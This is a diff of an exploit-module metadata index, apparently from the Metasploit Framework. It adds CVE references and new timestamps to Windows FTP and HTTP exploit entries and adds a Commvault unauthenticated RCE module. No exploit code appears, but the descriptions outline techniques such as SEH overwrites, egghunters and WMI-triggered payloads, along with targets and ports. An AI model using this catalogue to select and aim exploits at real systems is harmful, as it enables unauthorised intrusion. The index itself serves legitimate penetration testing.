    "ref_name": "windows/ftp/easyftp_mkd_fixret",
@@ -166578,6 +167879,7 @@
    ],
    "description": "This module exploits a buffer overflow in the FileWrangler client\n          that is triggered when the client connects to a FTP server and lists\n          the directory contents, containing an overly long directory name.",
    "references": [
+      "CVE-2010-20045",
      "OSVDB-94555",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -166589,7 +167891,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/filewrangler_list_reply",
@@ -166623,6 +167925,7 @@
    ],
    "description": "Freefloat FTP Server is prone to an overflow condition. It\n          fails to properly sanitize user-supplied input resulting in a\n          stack-based buffer overflow. With a specially crafted 'USER'\n          command, a remote attacker can potentially have an unspecified\n          impact.",
    "references": [
+      "CVE-2012-10023",
      "OSVDB-69621",
      "EDB-23243"
    ],
@@ -166639,7 +167942,7 @@
    "targets": [
      "FreeFloat / Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/freefloatftp_user.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/freefloatftp_user",
@@ -166673,6 +167976,7 @@
    ],
    "description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n          needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n          3. User can write to anywhere on the server's file system.  As a result of these\n          poor implementations, a malicious user can just log in and then upload files,\n          and let WMI (Management Instrumentation service) to execute the payload uploaded.",
    "references": [
+      "CVE-2012-10030",
      "OSVDB-88302",
      "OSVDB-88303"
    ],
@@ -166689,7 +167993,7 @@
    "targets": [
      "FreeFloat"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/freefloatftp_wbem",
@@ -166723,6 +168027,7 @@
    ],
    "description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n          user-supplied input is not properly validated when handling a specially crafted\n          PASS command. This may allow a remote attacker to cause a buffer overflow,\n          resulting in a denial of service or allow the execution of arbitrary code.\n\n          freeFTPd must have an account set to authorization anonymous user account.",
    "references": [
+      "CVE-2013-10042",
      "OSVDB-96517",
      "EDB-27747",
      "BID-61905"
@@ -166740,7 +168045,7 @@
    "targets": [
      "freeFTPd 1.0.10 and below on Windows Desktop Version"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/freeftpd_pass.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/freeftpd_pass",
@@ -166828,6 +168133,7 @@
    ],
    "description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n          When processing the response on a PWD command, a stack based buffer overflow occurs.\n          This leads to arbitrary code execution when a structured exception handler gets\n          overwritten.",
    "references": [
+      "CVE-2019-9760",
      "OSVDB-68638",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -166839,7 +168145,7 @@
    "targets": [
      "XP SP3 Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/ftpgetter_pwd_reply",
@@ -166872,6 +168178,7 @@
    ],
    "description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n          triggered when the client connects to a FTP server which sends an overly long directory\n          and filename in response to a LIST command.\n\n          This will cause an access violation, and will eventually overwrite the saved extended\n          instruction pointer.  Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n          sniper was needed to make this one work.",
    "references": [
+      "CVE-2010-20108",
      "OSVDB-68714",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -166885,7 +168192,7 @@
      "XP SP3 Professional, German - shlwapi 6.00.2900.5912",
      "XP SP3 Professional, English - shlwapi 6.00.2900.5512"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/ftppad_list_reply",
@@ -166918,6 +168225,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n          triggered when the ftp client tries to process an overly long response to a PWD\n          command. This will overwrite the saved EIP and structured exception handler.",
    "references": [
+      "CVE-2017-6465",
      "OSVDB-68639",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -166929,7 +168237,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/ftpshell51_pwd_reply",
@@ -167008,6 +168316,7 @@
    ],
    "description": "This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n          version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n          the client in response to a LIST command.\n          The LIST command gets issued when doing a preview or when you have just created a new\n          sync profile and allow the tool to see the differences.\n          This will overwrite a structured exception handler and trigger an access violation.",
    "references": [
+      "CVE-2010-20107",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
    "platform": "Windows",
@@ -167018,7 +168327,7 @@
    "targets": [
      "XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/ftpsynch_list_reply",
@@ -167052,6 +168361,7 @@
    ],
    "description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n          processing the response received after sending a LIST request. If this response contains\n          a long filename, a buffer overflow occurs, overwriting a structured exception handler.",
    "references": [
+      "CVE-2010-20034",
      "OSVDB-68641",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -167063,7 +168373,7 @@
    "targets": [
      "XP SP3 Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/gekkomgr_list_reply",
@@ -167348,6 +168658,7 @@
    ],
    "description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n          This issue is triggered when a file with a long name is downloaded/opened.",
    "references": [
+      "CVE-2010-20049",
      "OSVDB-68640",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -167359,7 +168670,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/leapftp_list_reply",
@@ -167551,6 +168862,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n          triggered when processing the response on a LIST command. During the overflow,\n          a structured exception handler record gets overwritten.",
    "references": [
+      "CVE-2010-10014",
      "OSVDB-68824",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -167562,7 +168874,7 @@
    "targets": [
      "XP SP3 Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/odin_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/odin_list_reply",
@@ -167897,6 +169209,7 @@
    ],
    "description": "This module exploits a vulnerability found in QuickShare File Server's FTP\n          service.  By supplying \"../\" in the file path, it is possible to trigger a\n          directory traversal flaw, allowing the attacker to read a file outside the\n          virtual directory.  By default, the \"Writable\" option is enabled during account\n          creation, therefore this makes it possible to create a file at an arbitrary\n          location, which leads to remote code execution.",
    "references": [
+      "CVE-2011-10010",
      "OSVDB-70776",
      "EDB-16105",
      "URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html",
@@ -167918,7 +169231,7 @@
    "targets": [
      "QuickShare File Server 1.2.1"
    ],
-    "mod_time": "2025-06-06 12:39:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/quickshare_traversal_write",
@@ -168004,6 +169317,7 @@
    ],
    "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n          The vulnerability exists in the processing of LIST commands. In order to trigger\n          the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n          application, in the target machine. On the other hand, the source IP address used\n          to connect with the FTP Server is needed. If the user can't provide it, the module\n          will try to resolve it. This module has been tested successfully on Sami FTP Server\n          2.0.1 over Windows XP SP3.",
    "references": [
+      "CVE-2008-5106",
      "OSVDB-90815",
      "BID-58247",
      "EDB-24557"
@@ -168021,7 +169335,7 @@
    "targets": [
      "Sami FTP Server 2.0.1 / Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/sami_ftpd_list",
@@ -168211,6 +169525,7 @@
    ],
    "description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n          triggered when the ftp client processes a response to a LIST command. If the\n          response contains an overly long file/folder name, a buffer overflow occurs,\n          overwriting a structured exception handler.",
    "references": [
+      "CVE-2010-20007",
      "OSVDB-94556",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -168222,7 +169537,7 @@
    "targets": [
      "XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/seagull_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/seagull_list_reply",
@@ -168458,6 +169773,7 @@
    ],
    "description": "This module exploits a buffer overflow vulnerability found in the PORT\n          command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n          code execution under the context of SYSTEM.",
    "references": [
+      "CVE-2012-10035",
      "EDB-22161",
      "OSVDB-85887"
    ],
@@ -168476,7 +169792,7 @@
      "Windows Universal TurboFtp 1.30.823",
      "Windows Universal TurboFtp 1.30.826"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/turboftp_port.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/turboftp_port",
@@ -168509,6 +169825,7 @@
    ],
    "description": "This module exploits an out-of-bounds array access in the Arcane Software\n          Vermillion FTP server. By sending a specially crafted FTP PORT command,\n          an attacker can corrupt stack memory and execute arbitrary code.\n\n          This particular issue is caused by processing data bound by attacker\n          controlled input while writing into a 4 byte stack buffer. Unfortunately,\n          the writing that occurs is not a simple byte copy.\n\n          Processing is done using a source ptr (p) and a destination pointer (q).\n          The vulnerable function walks the input string and continues while the\n          source byte is non-null. If a comma is encountered, the function increments\n          the destination pointer. If an ascii digit [0-9] is encountered, the\n          following occurs:\n\n          *q = (*q * 10) + (*p - '0');\n\n          All other input characters are ignored in this loop.\n\n          As a consequence, an attacker must craft input such that modifications\n          to the current values on the stack result in usable values. In this exploit,\n          the low two bytes of the return address are adjusted to point at the\n          location of a 'call edi' instruction within the binary. This was chosen\n          since 'edi' points at the source buffer when the function returns.\n\n          NOTE: This server can be installed as a service using \"vftpd.exe install\".\n          If so, the service does not restart automatically, giving an attacker only\n          one attempt.",
    "references": [
+      "CVE-2010-20115",
      "OSVDB-62163",
      "EDB-11293"
    ],
@@ -168526,7 +169843,7 @@
      "Automatic Targeting",
      "vftpd 1.31 - Windows XP SP3 English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/vermillion_ftpd_port",
@@ -168716,6 +170033,7 @@
    ],
    "description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n          This issue is triggered when a client connects to the server and is\n          expecting the Server Ready response.",
    "references": [
+      "CVE-2025-34107",
      "EDB-40693",
      "URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt"
    ],
@@ -168727,7 +170045,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/winaxe_server_ready",
@@ -168761,6 +170079,7 @@
    ],
    "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n          versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n          an attacker can use os.execute() to execute arbitrary system commands on\n          the target with SYSTEM privileges.",
    "references": [
+      "CVE-2025-47812",
      "URL-http://www.wftpserver.com",
      "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"
    ],
@@ -168785,7 +170104,7 @@
    "targets": [
      "Wing FTP Server >= 3.0.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/wing_ftp_admin_exec",
@@ -168922,6 +170241,7 @@
    ],
    "description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n          through an excessively long PWD message.",
    "references": [
+      "CVE-2010-20122",
      "OSVDB-63968",
      "EDB-12332"
    ],
@@ -168933,7 +170253,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/xftp_client_pwd",
@@ -169567,6 +170887,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n          Library Management System (NetOpacs). The webquery.dll\n          API is available through IIS requests. By specifying\n          an overly long string to the 'app' parameter, SeH can be\n          reliably overwritten allowing for arbitrary remote code execution.\n          In addition, it is possible to overwrite EIP by specifying\n          an arbitrary parameter name with an '=' terminator.",
    "references": [
+      "CVE-2010-20112",
      "OSVDB-66814",
      "BID-42293",
      "URL-http://www.aushack.com/advisories/"
@@ -169579,7 +170900,7 @@
    "targets": [
      "Windows 2000 Pro All - English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb",
    "is_install_path": true,
    "ref_name": "windows/http/amlibweb_webquerydll_app",
@@ -170244,6 +171565,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n          4.0.2 build 1219. When sending a specially crafted http request,\n          an attacker may be able to execute arbitrary code.",
    "references": [
+      "CVE-2009-20009",
      "OSVDB-54395",
      "BID-34033",
      "EDB-8173"
@@ -170269,7 +171591,7 @@
    "targets": [
      "Windows XP SP3 English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/belkin_bulldog.rb",
    "is_install_path": true,
    "ref_name": "windows/http/belkin_bulldog",
@@ -170681,6 +172003,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/commvault_rce_cve_2025_57790_cve_2025_57791": {
+    "name": "Commvault Command-Line Argument Injection to Traversal Remote Code Execution",
+    "fullname": "exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-08-19",
+    "type": "exploit",
+    "author": [
+      "Sonny Macdonald",
+      "Piotr Bazydlo",
+      "remmons-r7"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution exploit chain for Commvault,\n          tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated\n          access to the 'localadmin' account, which then facilitates code execution via expression\n          language injection. CVE-2025-57788 is also leveraged to leak the target host name, which is\n          necessary knowledge to exploit the remote code execution chain. This module executes in\n          the context of 'NETWORK SERVICE' on Windows.",
+    "references": [
+      "CVE-2025-57790",
+      "CVE-2025-57791",
+      "CVE-2025-57788",
+      "URL-https://documentation.commvault.com/securityadvisories/CV_2025_08_1.html",
+      "URL-https://documentation.commvault.com/securityadvisories/CV_2025_08_2.html",
+      "URL-https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2025-09-15 11:19:49 +0000",
+    "path": "/modules/exploits/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/commvault_rce_cve_2025_57790_cve_2025_57791",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/cyclope_ess_sqli": {
    "name": "Cyclope Employee Surveillance Solution v6 SQL Injection",
    "fullname": "exploit/windows/http/cyclope_ess_sqli",
@@ -170694,6 +172081,7 @@
    ],
    "description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n          Solution.  Because the login script does not properly handle the user-supplied\n          username parameter, a malicious user can manipulate the SQL query, and allows\n          arbitrary code execution under the context of 'SYSTEM'.",
    "references": [
+      "CVE-2012-10047",
      "OSVDB-84517",
      "EDB-20393"
    ],
@@ -170718,7 +172106,7 @@
    "targets": [
      "Cyclope Employee Surveillance Solution v6.2 or older"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb",
    "is_install_path": true,
    "ref_name": "windows/http/cyclope_ess_sqli",
@@ -170933,6 +172321,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n          9.0.34. If a malicious user sends a malicious HTTP login request,\n          it is possible to execute a payload that would run under the Windows\n          NT AUTHORITY\\SYSTEM account. Due to size constraints, this module\n          uses the Egghunter technique.",
    "references": [
+      "CVE-2025-34108",
      "EDB-40452"
    ],
    "platform": "Windows",
@@ -170956,7 +172345,7 @@
    "targets": [
      "Disk Pulse Enterprise 9.0.34"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/disk_pulse_enterprise_bof",
@@ -170990,6 +172379,7 @@
    ],
    "description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n          9.9.16. If a malicious user sends a crafted HTTP GET request\n          it is possible to execute a payload that would run under the Windows\n          NT AUTHORITY\\SYSTEM account.",
    "references": [
+      "CVE-2017-13696",
      "EDB-42560"
    ],
    "platform": "Windows",
@@ -171013,7 +172403,7 @@
    "targets": [
      "Disk Pulse Enterprise 9.9.16"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb",
    "is_install_path": true,
    "ref_name": "windows/http/disk_pulse_enterprise_get",
@@ -171049,6 +172439,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow vulnerability\n          in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n          caused by improper bounds checking of the request path in HTTP GET\n          requests sent to the built-in web server. This module has been\n          tested successfully on Windows XP SP3 and Windows 7 SP1.",
    "references": [
+      "CVE-2025-34105",
      "EDB-40869",
      "EDB-42395"
    ],
@@ -171076,7 +172467,7 @@
      "DiskBoss Enterprise v7.5.12",
      "DiskBoss Enterprise v8.2.14"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/diskboss_get_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/diskboss_get_bof",
@@ -171482,6 +172873,7 @@
    ],
    "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.",
    "references": [
+      "CVE-2017-9544",
      "EDB-42155"
    ],
    "platform": "Windows",
@@ -171505,7 +172897,7 @@
    "targets": [
      "Easy Chat Server 2.0 to 3.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/easychatserver_seh.rb",
    "is_install_path": true,
    "ref_name": "windows/http/easychatserver_seh",
@@ -171539,6 +172931,7 @@
    ],
    "description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.",
    "references": [
+      "CVE-2025-34096",
      "EDB-42186"
    ],
    "platform": "Windows",
@@ -171549,7 +172942,7 @@
    "targets": [
      "Easy File Sharing 7.2 HTTP"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/easyfilesharing_post.rb",
    "is_install_path": true,
    "ref_name": "windows/http/easyfilesharing_post",
@@ -171582,6 +172975,7 @@
    ],
    "description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.",
    "references": [
+      "CVE-2018-9059",
      "EDB-39008"
    ],
    "platform": "Windows",
@@ -171592,7 +172986,7 @@
    "targets": [
      "Easy File Sharing 7.2 HTTP"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/easyfilesharing_seh.rb",
    "is_install_path": true,
    "ref_name": "windows/http/easyfilesharing_seh",
@@ -171626,6 +173020,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n          and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n          supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n          EasyFTP allows anonymous access by default; valid credentials are typically\n          unnecessary to exploit this vulnerability.\n\n          After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n          Due to limited space, as well as difficulties using an egghunter, the use of\n          staged, ORD, and/or shell payloads is recommended.",
    "references": [
+      "CVE-2010-20113",
      "OSVDB-66614",
      "EDB-11500"
    ],
@@ -171650,7 +173045,7 @@
    "targets": [
      "Windows XP SP3 - Easy FTP Server Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/easyftp_list.rb",
    "is_install_path": true,
    "ref_name": "windows/http/easyftp_list",
@@ -172525,6 +173920,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n          for versions 6.4.017 and earlier. If a malicious user sends packets\n          containing an overly long string, it may be possible to execute a\n          payload remotely. Due to size constraints, this module uses the\n          Egghunter technique.",
    "references": [
+      "CVE-2024-23985",
      "OSVDB-83065",
      "BID-54056",
      "EDB-19266",
@@ -172538,7 +173934,7 @@
    "targets": [
      "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/ezserver_http.rb",
    "is_install_path": true,
    "ref_name": "windows/http/ezserver_http",
@@ -175518,6 +176914,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n          internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n          vulnerable.\n\n          The administration web page on port 18881 is vulnerable to a remote buffer overflow\n          attack. By sending a long character string in the password field, both the structured\n          exception handler and the saved extended instruction pointer are over written, allowing\n          an attacker to gain control of the application and the underlying operating system\n          remotely.\n\n          The administration website service runs with SYSTEM privileges, and automatically\n          restarts when it crashes.",
    "references": [
+      "CVE-2010-5333",
      "OSVDB-67909",
      "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061"
    ],
@@ -175544,7 +176941,7 @@
      "Integard Home 2.0.0.9021",
      "Integard Pro  2.2.0.9026"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/integard_password_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/integard_password_bof",
@@ -175577,6 +176974,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n          By sending a specially crafted GET request, an attacker may be able to execute\n          arbitrary code.",
    "references": [
+      "CVE-2009-20005",
      "OSVDB-60549",
      "BID-37177"
    ],
@@ -175601,7 +176999,7 @@
    "targets": [
      "Windows 2000 SP4 English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/intersystems_cache.rb",
    "is_install_path": true,
    "ref_name": "windows/http/intersystems_cache",
@@ -175635,6 +177033,7 @@
    ],
    "description": "This module exploits a boundary condition error in Intrasrv Simple Web\n          Server 1.0. The web interface does not validate the boundaries of an\n          HTTP request string prior to copying the data to an insufficiently sized\n          buffer. Successful exploitation leads to arbitrary remote code execution\n          in the context of the application.",
    "references": [
+      "CVE-2019-17181",
      "OSVDB-94097",
      "EDB-18397",
      "BID-60229"
@@ -175647,7 +177046,7 @@
    "targets": [
      "v1.0 - XP / Win7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/intrasrv_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/intrasrv_bof",
@@ -175981,6 +177380,7 @@
    ],
    "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n          6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous\n          authentication, leading to arbitrary code execution with IUSR privileges.",
    "references": [
+      "CVE-2013-10034",
      "OSVDB-99984",
      "BID-63782",
      "EDB-29675",
@@ -176007,7 +177407,7 @@
    "targets": [
      "Kaseya KServer / Windows"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb",
    "is_install_path": true,
    "ref_name": "windows/http/kaseya_uploadimage_file_upload",
@@ -177507,6 +178907,7 @@
    ],
    "description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n          The software contains a file upload vulnerability that allows an\n          unauthenticated remote attacker to write arbitrary files to the file system.\n\n          Code execution can be achieved by first uploading the payload to the remote\n          machine as an exe file, and then upload another mof file, which enables\n          WMI (Management Instrumentation service) to execute the uploaded payload.\n          Please note that this module currently only works for Windows before Vista.",
    "references": [
+      "CVE-2013-10047",
      "OSVDB-92198",
      "OSVDB-92200",
      "PACKETSTORM-121168"
@@ -177532,7 +178933,7 @@
    "targets": [
      "MiniWeb build 300 on Windows (Before Vista)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb",
    "is_install_path": true,
    "ref_name": "windows/http/miniweb_upload_wbem",
@@ -178134,6 +179535,7 @@
    ],
    "description": "This module allows an attacker with knowledge of the admin password of NSClient++\n          to start a privilege shell.\n          For this module to work, both web interface of NSClient++ and `ExternalScripts` feature\n          should be enabled.",
    "references": [
+      "CVE-2025-34079",
      "EDB-48360"
    ],
    "platform": "Windows",
@@ -178157,7 +179559,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/nscp_authenticated_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/nscp_authenticated_rce",
@@ -178246,6 +179648,7 @@
    ],
    "description": "This module can be used to execute a payload on an Octopus Deploy server given\n          valid credentials or an API key. The payload is executed as a powershell script step\n          on the Octopus Deploy server during a deployment.",
    "references": [
+      "CVE-2018-18850",
      "URL-https://octopus.com"
